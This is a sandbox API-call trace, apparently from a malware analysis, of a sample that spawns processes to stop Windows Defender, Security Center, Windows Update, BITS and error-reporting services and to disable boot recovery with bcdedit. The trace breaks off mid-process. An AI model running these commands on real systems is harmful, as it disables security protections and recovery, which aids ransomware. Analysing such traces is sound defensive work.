AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x7a8 [0057.055] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fddc | out: lpSystemTimeAsFileTime=0x12fddc*(dwLowDateTime=0x18c03940, dwHighDateTime=0x1d62227)) [0057.055] GetCurrentProcessId () returned 0x434 [0057.055] GetCurrentThreadId () returned 0x7a8 [0057.055] GetTickCount () returned 0x1148ea9 [0057.055] QueryPerformanceCounter (in: lpPerformanceCount=0x12fdd4 | out: lpPerformanceCount=0x12fdd4*=17701037614) returned 1 [0057.055] GetModuleHandleA (lpModuleName=0x0) returned 0x8e0000 [0057.055] __set_app_type (_Type=0x1) [0057.055] __p__fmode () returned 0x770331f4 [0057.055] __p__commode () returned 0x770331fc [0057.056] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8e79c7) returned 0x0 [0057.056] __wgetmainargs (in: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024, _DoWildCard=0, _StartInfo=0x8e9034 | out: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024) returned 0 [0057.056] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.061] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.061] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.061] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0057.061] _wcsicmp (_String1="stop", _String2="query") returned 2 [0057.061] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0057.061] _wcsicmp (_String1="stop", _String2="start") returned 14 [0057.061] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0057.061] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0057.061] _wcsicmp (_String1="stop", _String2="control") returned 16 [0057.061] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0057.061] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0057.061] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x59f680 [0057.065] OpenServiceW (hSCManager=0x59f680, lpServiceName="wscsvc", dwDesiredAccess=0x20) returned 0x59f5e0 [0057.066] ControlService (in: hService=0x59f5e0, dwControl=0x1, lpServiceStatus=0x12fcd8 | out: lpServiceStatus=0x12fcd8*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0057.066] GetLastError () returned 0x426 [0057.066] _itow (in: _Dest=0x426, _Radix=1244276 | out: _Dest=0x426) returned="1062" [0057.066] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x8e9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0057.069] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x12fc5c, nSize=0x2, Arguments=0x12fc68 | out: lpBuffer="㱈Z\x01") returned 0x49 [0057.070] GetFileType (hFile=0x7) returned 0x2 [0057.070] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fc30 | out: lpMode=0x12fc30) returned 1 [0057.071] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5a3c48*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x12fc4c, lpReserved=0x0 | out: lpBuffer=0x5a3c48*, lpNumberOfCharsWritten=0x12fc4c*=0x49) returned 1 [0057.071] LocalFree (hMem=0x5a3c48) returned 0x0 [0057.071] LocalFree (hMem=0x0) returned 0x0 [0057.071] CloseServiceHandle (hSCObject=0x59f5e0) returned 1 [0057.072] CloseServiceHandle (hSCObject=0x59f680) returned 1 [0057.139] exit (_Code=1062) Thread: id = 23 os_tid = 0xaf8 Process: id = "3" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x424d7000" os_pid = "0x564" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "sc stop WinDefend" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x560 [0056.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fbcc | out: lpSystemTimeAsFileTime=0x10fbcc*(dwLowDateTime=0x184df740, dwHighDateTime=0x1d62227)) [0056.215] GetCurrentProcessId () returned 0x564 [0056.215] GetCurrentThreadId () returned 0x560 [0056.215] GetTickCount () returned 0x1148bbc [0056.215] QueryPerformanceCounter (in: lpPerformanceCount=0x10fbc4 | out: lpPerformanceCount=0x10fbc4*=17617010718) returned 1 [0056.215] GetModuleHandleA (lpModuleName=0x0) returned 0x8e0000 [0056.215] __set_app_type (_Type=0x1) [0056.215] __p__fmode () returned 0x770331f4 [0056.215] __p__commode () returned 0x770331fc [0056.215] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8e79c7) returned 0x0 [0056.216] __wgetmainargs (in: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024, _DoWildCard=0, _StartInfo=0x8e9034 | out: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024) returned 0 [0056.216] SetThreadUILanguage (LangId=0x0) returned 0x409 [0056.220] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.220] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0056.221] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0056.221] _wcsicmp (_String1="stop", _String2="query") returned 2 [0056.221] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0056.221] _wcsicmp (_String1="stop", _String2="start") returned 14 [0056.221] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0056.221] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0056.221] _wcsicmp (_String1="stop", _String2="control") returned 16 [0056.221] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0056.221] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0056.221] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x63f690 [0056.226] OpenServiceW (hSCManager=0x63f690, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x63f5f0 [0056.227] ControlService (in: hService=0x63f5f0, dwControl=0x1, lpServiceStatus=0x10fac8 | out: lpServiceStatus=0x10fac8*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0056.227] GetLastError () returned 0x426 [0056.227] _itow (in: _Dest=0x426, _Radix=1112676 | out: _Dest=0x426) returned="1062" [0056.227] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x8e9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0056.255] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x10fa4c, nSize=0x2, Arguments=0x10fa58 | out: lpBuffer="㲀d\x01") returned 0x49 [0056.413] GetFileType (hFile=0x7) returned 0x2 [0056.413] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x10fa20 | out: lpMode=0x10fa20) returned 1 [0056.414] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x643c80*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x10fa3c, lpReserved=0x0 | out: lpBuffer=0x643c80*, lpNumberOfCharsWritten=0x10fa3c*=0x49) returned 1 [0056.414] LocalFree (hMem=0x643c80) returned 0x0 [0056.414] LocalFree (hMem=0x0) returned 0x0 [0056.415] CloseServiceHandle (hSCObject=0x63f5f0) returned 1 [0056.415] CloseServiceHandle (hSCObject=0x63f690) returned 1 [0056.430] exit (_Code=1062) Thread: id = 19 os_tid = 0xb44 Process: id = "4" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x444dc000" os_pid = "0x23c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "sc stop wuauserv" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x2a8 [0056.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8fee4 | out: lpSystemTimeAsFileTime=0x8fee4*(dwLowDateTime=0x18aacce0, dwHighDateTime=0x1d62227)) [0056.924] GetCurrentProcessId () returned 0x23c [0056.924] GetCurrentThreadId () returned 0x2a8 [0056.924] GetTickCount () returned 0x1148e1d [0056.924] QueryPerformanceCounter (in: lpPerformanceCount=0x8fedc | out: lpPerformanceCount=0x8fedc*=17687914863) returned 1 [0056.924] GetModuleHandleA (lpModuleName=0x0) returned 0x8e0000 [0056.924] __set_app_type (_Type=0x1) [0056.924] __p__fmode () returned 0x770331f4 [0056.924] __p__commode () returned 0x770331fc [0056.924] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8e79c7) returned 0x0 [0056.924] __wgetmainargs (in: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024, _DoWildCard=0, _StartInfo=0x8e9034 | out: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024) returned 0 [0056.925] SetThreadUILanguage (LangId=0x0) returned 0x409 [0056.936] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0056.936] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0056.936] _wcsicmp (_String1="stop", _String2="query") returned 2 [0056.936] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0056.936] _wcsicmp (_String1="stop", _String2="start") returned 14 [0056.936] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0056.936] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0056.936] _wcsicmp (_String1="stop", _String2="control") returned 16 [0056.936] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0056.936] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0056.936] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5df690 [0056.945] OpenServiceW (hSCManager=0x5df690, lpServiceName="wuauserv", dwDesiredAccess=0x20) returned 0x5df5f0 [0056.945] ControlService (in: hService=0x5df5f0, dwControl=0x1, lpServiceStatus=0x8fde0 | out: lpServiceStatus=0x8fde0*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0056.946] GetLastError () returned 0x426 [0056.946] _itow (in: _Dest=0x426, _Radix=589180 | out: _Dest=0x426) returned="1062" [0056.946] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x8e9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0056.948] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x8fd64, nSize=0x2, Arguments=0x8fd70 | out: lpBuffer="㲀^\x01") returned 0x49 [0056.948] GetFileType (hFile=0x7) returned 0x2 [0056.951] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x8fd38 | out: lpMode=0x8fd38) returned 1 [0056.952] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5e3c80*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x8fd54, lpReserved=0x0 | out: lpBuffer=0x5e3c80*, lpNumberOfCharsWritten=0x8fd54*=0x49) returned 1 [0056.952] LocalFree (hMem=0x5e3c80) returned 0x0 [0056.953] LocalFree (hMem=0x0) returned 0x0 [0056.953] CloseServiceHandle (hSCObject=0x5df5f0) returned 1 [0056.953] CloseServiceHandle (hSCObject=0x5df690) returned 1 [0057.119] exit (_Code=1062) Thread: id = 20 os_tid = 0xb50 Process: id = "5" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x443e1000" os_pid = "0x114" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "sc stop BITS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0x79c [0057.019] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f8f4 | out: lpSystemTimeAsFileTime=0x10f8f4*(dwLowDateTime=0x18b91520, dwHighDateTime=0x1d62227)) [0057.019] GetCurrentProcessId () returned 0x114 [0057.019] GetCurrentThreadId () returned 0x79c [0057.019] GetTickCount () returned 0x1148e7a [0057.019] QueryPerformanceCounter (in: lpPerformanceCount=0x10f8ec | out: lpPerformanceCount=0x10f8ec*=17697478126) returned 1 [0057.020] GetModuleHandleA (lpModuleName=0x0) returned 0x8e0000 [0057.020] __set_app_type (_Type=0x1) [0057.020] __p__fmode () returned 0x770331f4 [0057.020] __p__commode () returned 0x770331fc [0057.020] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8e79c7) returned 0x0 [0057.020] __wgetmainargs (in: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024, _DoWildCard=0, _StartInfo=0x8e9034 | out: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024) returned 0 [0057.021] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.026] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.026] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0057.026] _wcsicmp (_String1="stop", _String2="query") returned 2 [0057.026] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0057.026] _wcsicmp (_String1="stop", _String2="start") returned 14 [0057.026] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0057.026] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0057.026] _wcsicmp (_String1="stop", _String2="control") returned 16 [0057.026] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0057.026] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0057.026] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x31f680 [0057.030] OpenServiceW (hSCManager=0x31f680, lpServiceName="BITS", dwDesiredAccess=0x20) returned 0x31f5e0 [0057.031] ControlService (in: hService=0x31f5e0, dwControl=0x1, lpServiceStatus=0x10f7f0 | out: lpServiceStatus=0x10f7f0*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0057.031] GetLastError () returned 0x426 [0057.031] _itow (in: _Dest=0x426, _Radix=1111948 | out: _Dest=0x426) returned="1062" [0057.031] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x8e9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0057.034] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x10f774, nSize=0x2, Arguments=0x10f780 | out: lpBuffer="㱈2\x01") returned 0x49 [0057.034] GetFileType (hFile=0x7) returned 0x2 [0057.035] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x10f748 | out: lpMode=0x10f748) returned 1 [0057.035] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x323c48*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x10f764, lpReserved=0x0 | out: lpBuffer=0x323c48*, lpNumberOfCharsWritten=0x10f764*=0x49) returned 1 [0057.035] LocalFree (hMem=0x323c48) returned 0x0 [0057.035] LocalFree (hMem=0x0) returned 0x0 [0057.035] CloseServiceHandle (hSCObject=0x31f5e0) returned 1 [0057.133] CloseServiceHandle (hSCObject=0x31f680) returned 1 [0057.185] exit (_Code=1062) Thread: id = 24 os_tid = 0xac4 Process: id = "6" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x41fe6000" os_pid = "0x790" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "sc stop ERSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0x798 [0056.979] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fb9c | out: lpSystemTimeAsFileTime=0x16fb9c*(dwLowDateTime=0x18b45260, dwHighDateTime=0x1d62227)) [0056.979] GetCurrentProcessId () returned 0x790 [0056.979] GetCurrentThreadId () returned 0x798 [0056.979] GetTickCount () returned 0x1148e5b [0056.979] QueryPerformanceCounter (in: lpPerformanceCount=0x16fb94 | out: lpPerformanceCount=0x16fb94*=17693428578) returned 1 [0056.979] GetModuleHandleA (lpModuleName=0x0) returned 0x8e0000 [0056.979] __set_app_type (_Type=0x1) [0056.979] __p__fmode () returned 0x770331f4 [0056.979] __p__commode () returned 0x770331fc [0056.979] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8e79c7) returned 0x0 [0056.980] __wgetmainargs (in: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024, _DoWildCard=0, _StartInfo=0x8e9034 | out: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024) returned 0 [0056.980] SetThreadUILanguage (LangId=0x0) returned 0x409 [0056.983] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.983] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0056.983] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0056.984] _wcsicmp (_String1="stop", _String2="query") returned 2 [0056.984] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0056.984] _wcsicmp (_String1="stop", _String2="start") returned 14 [0056.984] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0056.984] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0056.984] _wcsicmp (_String1="stop", _String2="control") returned 16 [0056.984] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0056.984] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0056.984] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x65f680 [0056.988] OpenServiceW (hSCManager=0x65f680, lpServiceName="ERSvc", dwDesiredAccess=0x20) returned 0x0 [0056.989] GetLastError () returned 0x424 [0056.989] _itow (in: _Dest=0x424, _Radix=1505844 | out: _Dest=0x424) returned="1060" [0056.989] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x8e9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0056.992] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x16fa1c, nSize=0x2, Arguments=0x16fa28 | out: lpBuffer="ᣈf\x01") returned 0x62 [0056.992] GetFileType (hFile=0x7) returned 0x2 [0056.993] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f9f0 | out: lpMode=0x16f9f0) returned 1 [0056.993] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x6618c8*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x16fa0c, lpReserved=0x0 | out: lpBuffer=0x6618c8*, lpNumberOfCharsWritten=0x16fa0c*=0x62) returned 1 [0056.994] LocalFree (hMem=0x6618c8) returned 0x0 [0056.994] LocalFree (hMem=0x0) returned 0x0 [0056.994] CloseServiceHandle (hSCObject=0x65f680) returned 1 [0057.132] exit (_Code=1060) Thread: id = 22 os_tid = 0xacc Process: id = "7" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x42eeb000" os_pid = "0x7c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "sc stop WerSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7 os_tid = 0x5ac [0056.931] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fc34 | out: lpSystemTimeAsFileTime=0x25fc34*(dwLowDateTime=0x18ad2e40, dwHighDateTime=0x1d62227)) [0056.931] GetCurrentProcessId () returned 0x7c4 [0056.931] GetCurrentThreadId () returned 0x5ac [0056.931] GetTickCount () returned 0x1148e2c [0056.931] QueryPerformanceCounter (in: lpPerformanceCount=0x25fc2c | out: lpPerformanceCount=0x25fc2c*=17688618876) returned 1 [0056.931] GetModuleHandleA (lpModuleName=0x0) returned 0x8e0000 [0056.931] __set_app_type (_Type=0x1) [0056.931] __p__fmode () returned 0x770331f4 [0056.931] __p__commode () returned 0x770331fc [0056.931] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8e79c7) returned 0x0 [0056.932] __wgetmainargs (in: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024, _DoWildCard=0, _StartInfo=0x8e9034 | out: _Argc=0x8e9020, _Argv=0x8e9028, _Env=0x8e9024) returned 0 [0056.932] SetThreadUILanguage (LangId=0x0) returned 0x409 [0056.940] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0056.940] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0056.940] _wcsicmp (_String1="stop", _String2="query") returned 2 [0056.940] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0056.940] _wcsicmp (_String1="stop", _String2="start") returned 14 [0056.940] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0056.940] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0056.940] _wcsicmp (_String1="stop", _String2="control") returned 16 [0056.940] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0056.940] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0056.940] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4ef680 [0056.945] OpenServiceW (hSCManager=0x4ef680, lpServiceName="WerSvc", dwDesiredAccess=0x20) returned 0x4ef5e0 [0056.946] ControlService (in: hService=0x4ef5e0, dwControl=0x1, lpServiceStatus=0x25fb30 | out: lpServiceStatus=0x25fb30*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0056.948] GetLastError () returned 0x426 [0056.948] _itow (in: _Dest=0x426, _Radix=2489036 | out: _Dest=0x426) returned="1062" [0056.948] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x8e9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0056.950] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x25fab4, nSize=0x2, Arguments=0x25fac0 | out: lpBuffer="㱈O\x01") returned 0x49 [0056.951] GetFileType (hFile=0x7) returned 0x2 [0056.951] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x25fa88 | out: lpMode=0x25fa88) returned 1 [0056.952] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4f3c48*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x25faa4, lpReserved=0x0 | out: lpBuffer=0x4f3c48*, lpNumberOfCharsWritten=0x25faa4*=0x49) returned 1 [0056.953] LocalFree (hMem=0x4f3c48) returned 0x0 [0056.953] LocalFree (hMem=0x0) returned 0x0 [0056.953] CloseServiceHandle (hSCObject=0x4ef5e0) returned 1 [0056.953] CloseServiceHandle (hSCObject=0x4ef680) returned 1 [0057.128] exit (_Code=1062) Thread: id = 21 os_tid = 0xb08 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x437f1000" os_pid = "0x7d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "cmd.exe /c bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x54c [0062.750] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22faf4 | out: lpSystemTimeAsFileTime=0x22faf4*(dwLowDateTime=0x1a2084c0, dwHighDateTime=0x1d62227)) [0062.750] GetCurrentProcessId () returned 0x7d0 [0062.750] GetCurrentThreadId () returned 0x54c [0062.750] GetTickCount () returned 0x11497ae [0062.750] QueryPerformanceCounter (in: lpPerformanceCount=0x22faec | out: lpPerformanceCount=0x22faec*=18270544952) returned 1 [0062.751] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0062.751] __set_app_type (_Type=0x1) [0062.751] __p__fmode () returned 0x770331f4 [0062.836] __p__commode () returned 0x770331fc [0062.836] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0062.836] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: 